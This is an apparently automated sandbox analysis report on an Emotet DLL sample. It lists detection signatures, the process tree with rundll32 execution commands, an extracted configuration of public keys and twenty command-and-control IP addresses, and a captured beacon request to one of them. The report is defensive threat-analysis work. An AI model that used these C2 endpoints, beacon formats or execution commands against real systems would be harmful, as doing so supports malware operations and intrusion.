Loading ...

Play interactive tourEdit tour

Windows Analysis Report FIyE6huzxV

Overview

General Information

Sample Name:FIyE6huzxV (renamed file extension from none to dll)
Analysis ID:524856
MD5:ae5017480fc46fea5f5b35e684be8639
SHA1:b5f7941d2b2be6fc1ee9a95a214a39404661b2bc
SHA256:610f8e0834645e2bf2a47c9d7f8cff5e902bef45750f3c2d1ad84bea66b681ca
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6404 cmdline: loaddll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6416 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6436 cmdline: rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • BackgroundTransferHost.exe (PID: 6816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm",sRLFwndulUmgRNP MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Esbkudiqskvxrfyc\iscoyl.gsm",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6472 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6604 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7044 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6852 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1720 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5424 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4792 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5452 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1348 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6464 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.350213708.0000000002E7A000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000001.00000002.352423510.00000000008EB000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000A.00000002.377422235.00000000030DA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000013.00000002.773455424.0000000003285000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000007.00000002.352676760.00000000034EA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.loaddll32.exe.90bee8.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              7.2.rundll32.exe.3505238.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                5.2.rundll32.exe.2e943e0.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  5.2.rundll32.exe.2e943e0.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.2a55338.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6436, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, ProcessId: 6816

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.2.rundll32.exe.2e943e0.0.raw.unpackMalware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: FIyE6huzxV.dllVirustotal: Detection: 19%Perma Link
                      Source: FIyE6huzxV.dllReversingLabs: Detection: 22%
                      Source: FIyE6huzxV.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.7:49764 version: TLS 1.2
                      Source: FIyE6huzxV.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6CD1EE FindFirstFileExA,1_2_6E6CD1EE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6CD1EE FindFirstFileExA,3_2_6E6CD1EE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E1A80 FindFirstFileW,19_2_030E1A80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.7:49764 -> 51.178.61.60:443
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187Jump to behavior
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 51.178.61.60:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 45.79.33.48:8080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 177.72.80.14:7080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /ixufuEvpOVRaGsMcwVdxxNdVEbwDu HTTP/1.1Cookie: aCktUHAkMKD=TfyHqYLXTgYzdruEwNizDAfbCqZTgvqsH66CTQb1ytbBq80BnlqrtzN99nJXwaPo9lxyz/uAmFRullUIX0ZowWZs9CNvL/wvwz9s0Lyk9stGcsTkt35/6+ScCB6oHb65u6YN4GepkyMPsVCOcYLehsOLK7Ic3r5z0nvRBBYP/pa0Ftru5H1By1CJJuTLx5srUGF+6FxghaKUJmk9h02X8MAniWAG0gALx5fIxZLs/7s3UdtcvXiWG9uyM0dj8j6ddiLVwX64otV1KIALayfbuVeEUs4Up9/eppFXVuKG+YmasQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: svchost.exe, 00000006.00000002.633228868.0000019BB3862000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.773751286.0000000003303000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.551975946.000002E1BC900000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000006.00000002.633228868.0000019BB3862000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.551789701.000002E1BC0ED000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001E.00000003.532070250.000002E1BCE21000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000003.532019244.000002E1BC987000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000F.00000002.388191444.0000018F9B213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.772692496.0000015A28A46000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.772692496.0000015A28A46000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.772692496.0000015A28A46000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com.
                      Source: rundll32.exe, 00000013.00000003.440932609.00000000032E2000.00000004.00000001.sdmpString found in binary or memory: https://51.178.61.60/
                      Source: rundll32.exe, 00000013.00000002.773553604.00000000032BA000.00000004.00000020.sdmpString found in binary or memory: https://51.178.61.60/Y
                      Source: rundll32.exe, 00000013.00000003.440932609.00000000032E2000.00000004.00000001.sdmpString found in binary or memory: https://51.178.61.60/ixufuEvpOVRaGsMcwVdxxNdVEbwDu
                      Source: svchost.exe, 00000008.00000002.772692496.0000015A28A46000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.772554273.0000015A28A29000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.772554273.0000015A28A29000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000003.387685951.0000018F9B248000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000F.00000003.387772041.0000018F9B241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000F.00000003.387772041.0000018F9B241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000003.387772041.0000018F9B241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000001E.00000003.532070250.000002E1BCE21000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000003.532019244.000002E1BC987000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.387669870.0000018F9B264000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.387720088.0000018F9B25B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000F.00000003.387679897.0000018F9B262000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.362849002.0000018F9B231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.362849002.0000018F9B231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.387745693.0000018F9B257000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.388232424.0000018F9B23C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.388224173.0000018F9B23A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000F.00000003.387685951.0000018F9B248000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001E.00000003.532070250.000002E1BCE21000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000003.532019244.000002E1BC987000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001E.00000003.532070250.000002E1BCE21000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000003.532019244.000002E1BC987000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001E.00000003.533091604.000002E1BCE02000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F1027 InternetReadFile,19_2_030F1027
                      Source: global trafficHTTP traffic detected: GET /ixufuEvpOVRaGsMcwVdxxNdVEbwDu HTTP/1.1Cookie: aCktUHAkMKD=TfyHqYLXTgYzdruEwNizDAfbCqZTgvqsH66CTQb1ytbBq80BnlqrtzN99nJXwaPo9lxyz/uAmFRullUIX0ZowWZs9CNvL/wvwz9s0Lyk9stGcsTkt35/6+ScCB6oHb65u6YN4GepkyMPsVCOcYLehsOLK7Ic3r5z0nvRBBYP/pa0Ftru5H1By1CJJuTLx5srUGF+6FxghaKUJmk9h02X8MAniWAG0gALx5fIxZLs/7s3UdtcvXiWG9uyM0dj8j6ddiLVwX64otV1KIALayfbuVeEUs4Up9/eppFXVuKG+YmasQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.7:49764 version: TLS 1.2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A5EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode,1_2_6E6A5EE0

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 1.2.loaddll32.exe.90bee8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3505238.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e943e0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e943e0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a55338.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a55338.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.30f4200.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.90bee8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3505238.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.30f4200.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.350213708.0000000002E7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.352423510.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.377422235.00000000030DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.773455424.0000000003285000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.352676760.00000000034EA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.351034288.0000000003565000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.351194213.0000000002A3A000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: FIyE6huzxV.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Esbkudiqskvxrfyc\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082CAA81_2_0082CAA8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081441E1_2_0081441E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008243B31_2_008243B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008172831_2_00817283
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008306871_2_00830687
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00824E8A1_2_00824E8A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082748A1_2_0082748A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081CC8D1_2_0081CC8D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00813C911_2_00813C91
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082D0911_2_0082D091
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081AC951_2_0081AC95
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082AC9B1_2_0082AC9B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081FEA01_2_0081FEA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082D6A71_2_0082D6A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008278A51_2_008278A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008244AA1_2_008244AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081DAAE1_2_0081DAAE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00815AB21_2_00815AB2
